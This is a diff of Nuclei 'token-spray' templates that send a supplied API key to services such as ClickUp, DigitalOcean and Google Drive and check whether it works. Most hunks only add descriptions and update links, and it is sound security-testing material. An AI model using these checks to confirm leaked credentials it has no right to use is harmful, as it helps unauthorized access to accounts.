+++ b/token-spray/api-bitcoinaverage.yaml
@@ -4,9 +4,10 @@ info:
   name: BitcoinAverage API Test
   author: daffainfo
   severity: info
+  description: Digital Asset Price Data for the blockchain industry
   reference:
     - https://apiv2.bitcoinaverage.com/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/BitcoinAverage.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/bitcoinaverage
   tags: token-spray,bitcoinaverage
 
 self-contained: true
diff --git a/token-spray/api-bitquery.yaml b/token-spray/api-bitquery.yaml
index 3038daece0..d84492ea39 100644
--- a/token-spray/api-bitquery.yaml
+++ b/token-spray/api-bitquery.yaml
@@ -4,9 +4,10 @@ info:
   name: Bitquery API Test
   author: daffainfo
   severity: info
+  description: Onchain GraphQL APIs & DEX APIs
   reference:
     - https://graphql.bitquery.io/ide
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Bitquery.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/bitquery
   tags: token-spray,bitquery
 
 self-contained: true
diff --git a/token-spray/api-bitrise.yaml b/token-spray/api-bitrise.yaml
index c661330e56..2d05c3282d 100644
--- a/token-spray/api-bitrise.yaml
+++ b/token-spray/api-bitrise.yaml
@@ -4,9 +4,10 @@ info:
   name: Bitrise API Test
   author: daffainfo
   severity: info
+  description: Build tool and processes integrations to create efficient development pipelines
   reference:
     - https://api-docs.bitrise.io/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Continous%20Integration/Bitrise.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/bitrise
   tags: token-spray,bitrise
 
 self-contained: true
diff --git a/token-spray/api-blitapp.yaml b/token-spray/api-blitapp.yaml
new file mode 100644
index 0000000000..29222cc6d2
--- /dev/null
+++ b/token-spray/api-blitapp.yaml
@@ -0,0 +1,29 @@
+id: api-blitapp
+
+info:
+  name: Blitapp API Test
+  author: daffainfo
+  severity: info
+  description: Schedule screenshots of web pages and sync them to your cloud storage
+  reference:
+    - https://blitapp.com/api/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/blitapp
+  tags: token-spray,blitapp
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://blitapp.com/api/scheduledcapture HTTP/1.1
+        Host: blitapp.com
+        Accept: application/json
+        Api-key: {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id"'
+          - '"name"'
+          - '"apps"'
+        condition: and
diff --git a/token-spray/api-block.yaml b/token-spray/api-block.yaml
index 2de9ea1703..616a67dd9f 100644
--- a/token-spray/api-block.yaml
+++ b/token-spray/api-block.yaml
@@ -4,9 +4,10 @@ info:
   name: block.io API Test
   author: daffainfo
   severity: info
+  description: Bitcoin Payment, Wallet & Transaction Data
   reference:
     - https://block.io/docs/basic
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Block.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/block
   tags: token-spray,block
 
 self-contained: true
diff --git a/token-spray/api-blockchain.yaml b/token-spray/api-blockchain.yaml
index 1a219cc8c3..3e6d364487 100644
--- a/token-spray/api-blockchain.yaml
+++ b/token-spray/api-blockchain.yaml
@@ -4,9 +4,10 @@ info:
   name: Blockchain API Test
   author: daffainfo
   severity: info
+  description: Bitcoin Payment, Wallet & Transaction Data
   reference:
     - https://api.blockchain.com/v3/#/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/blockchain
   classification:
     cwe-id: CWE-200
   tags: token-spray,blockchain
diff --git a/token-spray/api-blockfrost.yaml b/token-spray/api-blockfrost.yaml
index bf175a9d6e..d01708ca92 100644
--- a/token-spray/api-blockfrost.yaml
+++ b/token-spray/api-blockfrost.yaml
@@ -4,9 +4,10 @@ info:
   name: Blockfrost API Test
   author: daffainfo
   severity: info
+  description: Interaction with the Cardano mainnet and several testnets
   reference:
     - https://docs.blockfrost.io/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockfrost.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/blockfrost
   tags: token-spray,blockfrost
 
 self-contained: true
diff --git a/token-spray/api-box.yaml b/token-spray/api-box.yaml
index 6995806e70..9b47605809 100644
--- a/token-spray/api-box.yaml
+++ b/token-spray/api-box.yaml
@@ -4,9 +4,10 @@ info:
   name: Box API Test
   author: daffainfo
   severity: info
+  description: File Sharing and Storage Service
   reference:
     - https://developer.box.com/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Box.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/box
   tags: token-spray,box
 
 self-contained: true
diff --git a/token-spray/api-bravenewcoin.yaml b/token-spray/api-bravenewcoin.yaml
index ef81f36b71..1fa0c10281 100644
--- a/token-spray/api-bravenewcoin.yaml
+++ b/token-spray/api-bravenewcoin.yaml
@@ -4,9 +4,10 @@ info:
   name: Brave New Coin API Test
   author: daffainfo
   severity: info
+  description: Real-time and historic crypto data from more than 200+ exchanges
   reference:
     - https://bravenewcoin.com/developers
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Brave%20New%20Coin.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/brave-new-coin
   tags: token-spray,bravenewcoin
 
 self-contained: true
diff --git a/token-spray/api-browshot.yaml b/token-spray/api-browshot.yaml
new file mode 100644
index 0000000000..7d882d928f
--- /dev/null
+++ b/token-spray/api-browshot.yaml
@@ -0,0 +1,26 @@
+id: api-browshot
+
+info:
+  name: Browshot API Test
+  author: daffainfo
+  severity: info
+  description: Easily make screenshots of web pages in any screen size, as any device
+  reference:
+    - https://browshot.com/api/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/browshot
+  tags: token-spray,browshot
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.browshot.com/api/v1/simple?url=http://mobilito.net/&instance_id=12&width=640&height=480&key={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"cost"'
+          - '"priority"'
+          - '"url"'
+        condition: and
diff --git a/token-spray/api-c99.yaml b/token-spray/api-c99.yaml
new file mode 100644
index 0000000000..0ca60b0740
--- /dev/null
+++ b/token-spray/api-c99.yaml
@@ -0,0 +1,21 @@
+id: api-c99
+
+info:
+  name: C99 API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://api.c99.nl
+  tags: c99,api,dns,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://api.c99.nl/ping?key={{token}}&host=1.1.1.1
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "PING 1.1.1.1"
diff --git a/token-spray/api-calendarific.yaml b/token-spray/api-calendarific.yaml
index 613239c4b1..6c4ff4596e 100644
--- a/token-spray/api-calendarific.yaml
+++ b/token-spray/api-calendarific.yaml
@@ -4,9 +4,10 @@ info:
   name: Calendarific API Test
   author: daffainfo
   severity: info
+  description: Worldwide Holidays
   reference:
     - https://calendarific.com/api-documentation
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Calendarific.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/calendarific
   tags: token-spray,calendarific
 
 self-contained: true
diff --git a/token-spray/api-chaos.yaml b/token-spray/api-chaos.yaml
new file mode 100644
index 0000000000..6619833d61
--- /dev/null
+++ b/token-spray/api-chaos.yaml
@@ -0,0 +1,25 @@
+id: api-chaos
+
+info:
+  name: Chaos API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://chaos.projectdiscovery.io/#/docs
+  tags: dns,recon,chaos,token-spray,projectdiscovery
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://dns.projectdiscovery.io/dns/projectdiscovery.io"
+    headers:
+      Authorization: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"domain":'
+          - '"subdomains":'
+        condition: and
diff --git a/token-spray/api-charity.yaml b/token-spray/api-charity.yaml
index ba28ca00cf..8e0b739c8b 100644
--- a/token-spray/api-charity.yaml
+++ b/token-spray/api-charity.yaml
@@ -4,9 +4,10 @@ info:
   name: Charity Search API Test
   author: daffainfo
   severity: info
+  description: Non-profit charity data
   reference:
     - http://charityapi.orghunter.com/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Charity%20Search.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/charity-search
   tags: token-spray,charity,search
 
 self-contained: true
diff --git a/token-spray/api-clearbit.yaml b/token-spray/api-clearbit.yaml
index cece51d861..fc8cf9c9ea 100644
--- a/token-spray/api-clearbit.yaml
+++ b/token-spray/api-clearbit.yaml
@@ -4,9 +4,10 @@ info:
   name: Clearbit API Test
   author: daffainfo
   severity: info
+  description: Search for company logos and embed them in your projects
   reference:
     - https://clearbit.com/docs
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Clearbit.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/clearbit
   tags: token-spray,clearbit
 
 self-contained: true
diff --git a/token-spray/api-clickup.yaml b/token-spray/api-clickup.yaml
new file mode 100644
index 0000000000..56524ada27
--- /dev/null
+++ b/token-spray/api-clickup.yaml
@@ -0,0 +1,28 @@
+id: api-clickup
+
+info:
+  name: ClickUp API Test
+  author: daffainfo
+  severity: info
+  description: ClickUp is a robust, cloud-based project management tool for boosting productivity
+  reference:
+    - https://clickup.com/api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/clickup
+  tags: token-spray,clickup
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.clickup.com/api/v2/user HTTP/1.1
+        Host: api.clickup.com
+        Authorization: {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"username":'
+          - '"email":'
+        condition: and
diff --git a/token-spray/api-clockify.yaml b/token-spray/api-clockify.yaml
new file mode 100644
index 0000000000..3fc3c22ceb
--- /dev/null
+++ b/token-spray/api-clockify.yaml
@@ -0,0 +1,29 @@
+id: api-clockify
+
+info:
+  name: Clockify API Test
+  author: daffainfo
+  severity: info
+  description: Clockify's REST-based API can be used to push/pull data to/from it & integrate it with other systems
+  reference:
+    - https://clockify.me/developers-api
+    - https://github.com/daffainfo/all-about-apikey/tree/main/clockify
+  tags: token-spray,clockify
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.clockify.me/api/v1/user HTTP/1.1
+        Host: api.clockify.me
+        X-Api-Key: {{token}}
+        Content-Type: application/json
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"email":'
+          - '"name":'
+        condition: and
diff --git a/token-spray/api-cloudconvert.yaml b/token-spray/api-cloudconvert.yaml
new file mode 100644
index 0000000000..d9dec21d91
--- /dev/null
+++ b/token-spray/api-cloudconvert.yaml
@@ -0,0 +1,27 @@
+id: api-cloudconvert
+
+info:
+  name: CloudConvert API Test
+  author: daffainfo
+  severity: info
+  description: Online file converter for audio, video, document, ebook, archive, image, spreadsheet, presentation
+  reference:
+    - https://cloudconvert.com/api/v2
+    - https://github.com/daffainfo/all-about-apikey/tree/main/cloudconvert
+  tags: token-spray,cloudconvert
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.cloudconvert.com/v2/tasks HTTP/1.1
+        Host: api.cloudconvert.com
+        Authorization: Bearer {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"data":'
+          - '"id":'
+        condition: and
diff --git a/token-spray/api-codestats.yaml b/token-spray/api-codestats.yaml
new file mode 100644
index 0000000000..187bbb9d79
--- /dev/null
+++ b/token-spray/api-codestats.yaml
@@ -0,0 +1,34 @@
+id: api-codestats
+
+info:
+  name: CodeStats API Test
+  author: daffainfo
+  severity: info
+  description: Automatic time tracking for programmers
+  reference:
+    - https://codestats.net/api-docs
+    - https://github.com/daffainfo/all-about-apikey/tree/main/codestats
+  tags: token-spray,codestats
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        POST https://codestats.net/api/my/pulses HTTP/1.1
+        Host: codestats.net
+        X-API-Token: {{token}}
+
+        {
+          "coded_at": "2016-04-24T01:43:56+12:00",
+          "xps": [
+            {"language": "C++",    "xp": 15},
+            {"language": "Elixir", "xp": 30},
+            {"language": "EEx",    "xp": 3}
+          ]
+        }
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"Great success!"'
diff --git a/token-spray/api-coinapi.yaml b/token-spray/api-coinapi.yaml
index 6c70ef0a39..e4a2e44374 100644
--- a/token-spray/api-coinapi.yaml
+++ b/token-spray/api-coinapi.yaml
@@ -4,9 +4,10 @@ info:
   name: CoinAPI API Test
   author: daffainfo
   severity: info
+  description: All Currency Exchanges integrate under a single api
   reference:
     - https://docs.coinapi.io/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinAPI.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi
   tags: token-spray,coinapi
 
 self-contained: true
diff --git a/token-spray/api-coinlayer.yaml b/token-spray/api-coinlayer.yaml
index 3ba1978c17..b0a16822cd 100644
--- a/token-spray/api-coinlayer.yaml
+++ b/token-spray/api-coinlayer.yaml
@@ -4,9 +4,10 @@ info:
   name: Coinlayer API Test
   author: daffainfo
   severity: info
+  description: Real-time Crypto Currency Exchange Rates
   reference:
     - https://coinlayer.com/documentation
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinlayer.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/coinlayer
   tags: token-spray,coinlayer
 
 self-contained: true
diff --git a/token-spray/api-coinmarketcap.yaml b/token-spray/api-coinmarketcap.yaml
index 3fa6d702c7..7acc9b5b1b 100644
--- a/token-spray/api-coinmarketcap.yaml
+++ b/token-spray/api-coinmarketcap.yaml
@@ -4,9 +4,10 @@ info:
   name: CoinMarketCap API Test
   author: daffainfo
   severity: info
+  description: Cryptocurrencies Prices
   reference:
     - https://coinmarketcap.com/api/documentation/v1
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinMarketCap.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/coinmarketcap
   tags: token-spray,coinmarketcap
 
 self-contained: true
diff --git a/token-spray/api-coinranking.yaml b/token-spray/api-coinranking.yaml
index 66bcd4d92f..e9c415df89 100644
--- a/token-spray/api-coinranking.yaml
+++ b/token-spray/api-coinranking.yaml
@@ -4,9 +4,10 @@ info:
   name: Coinranking API Test
   author: daffainfo
   severity: info
+  description: Live Cryptocurrency data
   reference:
     - https://developers.coinranking.com/api/documentation
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinranking.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/coinranking
   tags: token-spray,coinranking
 
 self-contained: true
diff --git a/token-spray/api-cooperhewitt.yaml b/token-spray/api-cooperhewitt.yaml
index 0da30b58ee..68be45f66d 100644
--- a/token-spray/api-cooperhewitt.yaml
+++ b/token-spray/api-cooperhewitt.yaml
@@ -4,9 +4,10 @@ info:
   name: Cooper Hewitt API
   author: daffainfo
   severity: info
+  description: Smithsonian Design Museum
   reference:
     - https://collection.cooperhewitt.org/api/methods/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/cooper-hewitt
   tags: token-spray,cooperhewitt
 
 self-contained: true
diff --git a/token-spray/api-covalent.yaml b/token-spray/api-covalent.yaml
index 159aca5e52..9fb44a3d2e 100644
--- a/token-spray/api-covalent.yaml
+++ b/token-spray/api-covalent.yaml
@@ -4,9 +4,10 @@ info:
   name: Covalent API Test
   author: daffainfo
   severity: info
+  description: https://github.com/daffainfo/all-about-apikey/tree/main/covalent
   reference:
     - https://www.covalenthq.com/docs/api/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Covalent.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/covalent
   tags: token-spray,covalent
 
 self-contained: true
diff --git a/token-spray/api-craftmypdf.yaml b/token-spray/api-craftmypdf.yaml
new file mode 100644
index 0000000000..5093bbe9ff
--- /dev/null
+++ b/token-spray/api-craftmypdf.yaml
@@ -0,0 +1,28 @@
+id: api-craftmypdf
+
+info:
+  name: CraftMyPDF API Test
+  author: daffainfo
+  severity: info
+  description: Generate PDF documents from templates with a drop-and-drop editor and a simple API
+  reference:
+    - https://pdflayer.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/craftmypdf
+  tags: token-spray,craftmypdf
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.craftmypdf.com/v1/list-templates?limit=300&offset=0 HTTP/1.1
+        Host: api.craftmypdf.com
+        Content-Type: application/json
+        X-API-KEY: {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"template_id":'
+          - '"name":'
+        condition: and
diff --git a/token-spray/api-currencyfreaks.yaml b/token-spray/api-currencyfreaks.yaml
new file mode 100644
index 0000000000..cfaf6d04ae
--- /dev/null
+++ b/token-spray/api-currencyfreaks.yaml
@@ -0,0 +1,26 @@
+id: api-currencyfreaks
+
+info:
+  name: CurrencyFreaks API Test
+  author: daffainfo
+  severity: info
+  description: Provides current and historical currency exchange rates with free plan 1K requests/month
+  reference:
+    - https://currencyfreaks.com/documentation.html
+    - https://github.com/daffainfo/all-about-apikey/tree/main/currencyfreaks
+  tags: token-spray,currencyfreaks
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.currencyfreaks.com/latest?apikey={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"date"'
+          - '"base"'
+          - '"rates"'
+        condition: and
diff --git a/token-spray/api-currencylayer.yaml b/token-spray/api-currencylayer.yaml
new file mode 100644
index 0000000000..a844182a19
--- /dev/null
+++ b/token-spray/api-currencylayer.yaml
@@ -0,0 +1,26 @@
+id: api-currencylayer
+
+info:
+  name: Currencylayer API Test
+  author: daffainfo
+  severity: info
+  description: Exchange rates and currency conversion
+  reference:
+    - https://currencylayer.com/documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/currencylayer
+  tags: token-spray,currencylayer
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "http://api.currencylayer.com/live?access_key={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"terms"'
+          - '"source"'
+          - '"quotes"'
+        condition: and
diff --git a/token-spray/api-currencyscoop.yaml b/token-spray/api-currencyscoop.yaml
new file mode 100644
index 0000000000..c0f8bc8258
--- /dev/null
+++ b/token-spray/api-currencyscoop.yaml
@@ -0,0 +1,26 @@
+id: api-currencyscoop
+
+info:
+  name: CurrencyScoop API Test
+  author: daffainfo
+  severity: info
+  description: Real-time and historical currency rates JSON API
+  reference:
+    - https://currencyscoop.com/api-documentation
+    - https://github.com/daffainfo/all-about-apikey/tree/main/currencyscoop
+  tags: token-spray,currencyscoop
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.currencyscoop.com/v1/historical?api_key={{token}}&date=2022-01-01"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"date"'
+          - '"base"'
+          - '"rates"'
+        condition: and
diff --git a/token-spray/api-ddownload.yaml b/token-spray/api-ddownload.yaml
index 85b00ccb5f..8831d47f77 100644
--- a/token-spray/api-ddownload.yaml
+++ b/token-spray/api-ddownload.yaml
@@ -4,9 +4,10 @@ info:
   name: ddownload API Test
   author: daffainfo
   severity: info
+  description: File Sharing and Storage
   reference:
     - https://ddownload.com/api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/ddownload.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/ddownload
   tags: token-spray,ddownload
 
 self-contained: true
diff --git a/token-spray/api-debounce.yaml b/token-spray/api-debounce.yaml
new file mode 100644
index 0000000000..2c1aef9552
--- /dev/null
+++ b/token-spray/api-debounce.yaml
@@ -0,0 +1,25 @@
+id: api-debounce
+
+info:
+  name: DeBounce API Test
+  author: 0ri2N
+  severity: info
+  reference:
+    - https://developers.debounce.io/reference/api-key-authentication
+    - https://debounce.io
+  tags: debounce,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://api.debounce.io/v1/?api={{token}}&email=test@interact.sh"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"balance":'
+          - '"success":'
+          - '"debounce":'
+        condition: and
diff --git a/token-spray/api-digitalocean.yaml b/token-spray/api-digitalocean.yaml
new file mode 100644
index 0000000000..d2909d4863
--- /dev/null
+++ b/token-spray/api-digitalocean.yaml
@@ -0,0 +1,25 @@
+id: api-digitalocean
+
+info:
+  name: DigitalOcean API Test
+  author: geeknik
+  severity: info
+  reference:
+    - https://docs.digitalocean.com/reference/api/
+  tags: token-spray,digitalocean
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api.digitalocean.com/v2/droplets HTTP/1.1
+        Host: api.digitalocean.com
+        Authorization: Bearer {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"droplets":'
+          - '"meta":'
+        condition: and
diff --git a/token-spray/api-dribbble.yaml b/token-spray/api-dribbble.yaml
index ec36263d18..8faec3f7a7 100644
--- a/token-spray/api-dribbble.yaml
+++ b/token-spray/api-dribbble.yaml
@@ -4,9 +4,10 @@ info:
   name: Dribbble API Test
   author: daffainfo
   severity: info
+  description: Dribbble is a self-promotion and social networking platform for digital designers and creatives
   reference:
     - https://developer.dribbble.com/v2/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Dribbble.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/dribbble
   tags: token-spray,dribbble
 
 self-contained: true
diff --git a/token-spray/api-ebird.yaml b/token-spray/api-ebird.yaml
index bcbcfdcb36..3329b311b9 100644
--- a/token-spray/api-ebird.yaml
+++ b/token-spray/api-ebird.yaml
@@ -4,9 +4,10 @@ info:
   name: eBird API Test
   author: daffainfo
   severity: info
+  description: Retrieve recent or notable birding observations within a region
   reference:
     - https://documenter.getpostman.com/view/664302/S1ENwy59
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/eBird.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/ebird
   tags: token-spray,ebird
 
 self-contained: true
diff --git a/token-spray/api-etherscan.yaml b/token-spray/api-etherscan.yaml
index f72998882f..0650684e1f 100644
--- a/token-spray/api-etherscan.yaml
+++ b/token-spray/api-etherscan.yaml
@@ -4,9 +4,10 @@ info:
   name: Etherscan API Test
   author: daffainfo
   severity: info
+  description: Ethereum explorer API
   reference:
     - https://docs.etherscan.io/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Etherscan.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/etherscan
   tags: token-spray,etherscan
 
 self-contained: true
diff --git a/token-spray/api-europeana.yaml b/token-spray/api-europeana.yaml
index c0767ce8d7..2495cb5782 100644
--- a/token-spray/api-europeana.yaml
+++ b/token-spray/api-europeana.yaml
@@ -4,9 +4,10 @@ info:
   name: Europeana API Test
   author: daffainfo
   severity: info
+  description: European Museum and Galleries content
   reference:
     - https://pro.europeana.eu/page/search
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Europeana.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/europeana
   tags: token-spray,europeana
 
 self-contained: true
diff --git a/token-spray/api-exchangerateapi.yaml b/token-spray/api-exchangerateapi.yaml
new file mode 100644
index 0000000000..79f4626b1b
--- /dev/null
+++ b/token-spray/api-exchangerateapi.yaml
@@ -0,0 +1,26 @@
+id: api-exchangerateapi
+
+info:
+  name: ExchangeRate-API API Test
+  author: daffainfo
+  severity: info
+  description: Free currency conversion
+  reference:
+    - https://www.exchangerate-api.com/docs/overview
+    - https://github.com/daffainfo/all-about-apikey/tree/main/exchangerate-api
+  tags: token-spray,exchangerateapi
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://v6.exchangerate-api.com/v6/{{token}}/latest/USD"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"time_next_update_utc"'
+          - '"base_code"'
+          - '"conversion_rates"'
+        condition: and
diff --git a/token-spray/api-festivo.yaml b/token-spray/api-festivo.yaml
index 30f758bdf2..3911ce2636 100644
--- a/token-spray/api-festivo.yaml
+++ b/token-spray/api-festivo.yaml
@@ -4,9 +4,10 @@ info:
   name: Festivo API Test
   author: daffainfo
   severity: info
+  description: Fastest and most advanced public holiday and observance service on the market
   reference:
     - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Festivo%20Public%20Holidays.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays
   tags: token-spray,festivo
 
 self-contained: true
diff --git a/token-spray/api-flickr.yaml b/token-spray/api-flickr.yaml
new file mode 100644
index 0000000000..20beaa54a4
--- /dev/null
+++ b/token-spray/api-flickr.yaml
@@ -0,0 +1,24 @@
+id: api-flickr
+
+info:
+  name: Flickr API Test
+  author: geeknik
+  severity: info
+  reference:
+    - https://www.flickr.com/services/developer/api/
+  tags: token-spray,flickr
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - "https://www.flickr.com/services/rest/?method=flickr.tags.getHotList&api_key={{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'secret'
+          - 'owner'
+          - 'username'
+        condition: and
diff --git a/token-spray/api-flowdash.yaml b/token-spray/api-flowdash.yaml
new file mode 100644
index 0000000000..3f51eb88b4
--- /dev/null
+++ b/token-spray/api-flowdash.yaml
@@ -0,0 +1,27 @@
+id: api-flowdash
+
+info:
+  name: Flowdash API Test
+  author: daffainfo
+  severity: info
+  description: Automate business workflows
+  reference:
+    - https://docs.flowdash.com/docs/api-introduction
+    - https://github.com/daffainfo/all-about-apikey/tree/main/flowdash
+  tags: token-spray,flowdash
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://app.flowdash.com/api/v1/workflows HTTP/1.1
+        Host: app.flowdash.com
+        Authorization: Bearer {{token}}
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"id":'
+          - '"name":'
+        condition: and
diff --git a/token-spray/api-front.yaml b/token-spray/api-front.yaml
new file mode 100644
index 0000000000..4e8f759419
--- /dev/null
+++ b/token-spray/api-front.yaml
@@ -0,0 +1,27 @@
+id: api-front
+
+info:
+  name: LaunchDarkly REST API
+  author: Luqmaan Hadia [Luqiih](https://github.com/Luqiih)
+  severity: info
+  reference:
+    - https://dev.frontapp.com/reference/introduction
+  tags: token-spray,front
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://api2.frontapp.com/accounts HTTP/1.1
+        Host: api2.frontapp.com
+        Authorization: Bearer {{token}}
+        Accept: application/json
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "logo_url"
+          - "name"
+        condition: and
diff --git a/token-spray/api-fullhunt.yaml b/token-spray/api-fullhunt.yaml
new file mode 100644
index 0000000000..f69fd590db
--- /dev/null
+++ b/token-spray/api-fullhunt.yaml
@@ -0,0 +1,29 @@
+id: api-fullhunt
+
+info:
+  name: FullHunt API Test
+  author: 0ri2N
+  severity: info
+  description: |
+    FullHunt holds one of the largest Databases for external attack surfaces of the entire Internet.
+  reference:
+    - https://fullhunt.io
+    - https://api-docs.fullhunt.io
+  tags: dns,scan,recon,fullhunt,database,token-spray
+
+self-contained: true
+requests:
+  - method: GET
+    path:
+      - https://fullhunt.io/api/v1/domain/interact.sh/details
+    headers:
+      X-API-Key: "{{token}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"dns"'
+          - '"hosts"'
+          - '"domain"'
+        condition: and
diff --git a/token-spray/api-gofile.yaml b/token-spray/api-gofile.yaml
index eb0c9e8b1d..840f6bdfbe 100644
--- a/token-spray/api-gofile.yaml
+++ b/token-spray/api-gofile.yaml
@@ -4,9 +4,10 @@ info:
   name: GoFile API Test
   author: daffainfo
   severity: info
+  description: Unlimited size file uploads for free
   reference:
     - https://gofile.io/api
-    - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/GoFile.md
+    - https://github.com/daffainfo/all-about-apikey/tree/main/gofile
   tags: token-spray,gofile
 
 self-contained: true
diff --git a/token-spray/api-google-drive.yaml b/token-spray/api-google-drive.yaml
new file mode 100644
index 0000000000..5898647485
--- /dev/null
+++ b/token-spray/api-google-drive.yaml
@@ -0,0 +1,23 @@
+id: api-google-drive
+
+info:
+  name: Google Drive API Test
+  author: geeknik
+  severity: info
+  reference:
+    - https://developers.google.com/drive/api/guides/about-sdk
+  tags: token-spray,google,drive
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1
+        Referer: {{referer}}
+        Content-Type:application/json
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'File not found: {{randstr}}.txt.'
diff --git a/token-spray/api-gorest.yaml b/token-spray/api-gorest.yaml
new file mode 100644
index 0000000000..7bb3131a2c
--- /dev/null
+++ b/token-spray/api-gorest.yaml
@@ -0,0 +1,33 @@
+id: api-gorest
+
+info:
+  name: Gorest API Test
+  author: daffainfo
+  severity: info
+  description: Online REST API for Testing and Prototyping
+  reference:
+    - https://gorest.co.in/
+    - https://github.com/daffainfo/all-about-apikey/tree/main/gorest
+  tags: token-spray,gorest
+
+self-contained: true
+requests:
+  - raw:
+      - |
+        GET https://gorest.co.in/public/v2/users HTTP/1.1
+        Host: gorest.co.in
+        Content-Type: application/json
+        Authorization: Bearer {{token}}
+
+        {"name":"Tenali Ramakrishna", "gender":"male", "email":"tenali.rdamakrishna@15ce.com", "status":"active"}
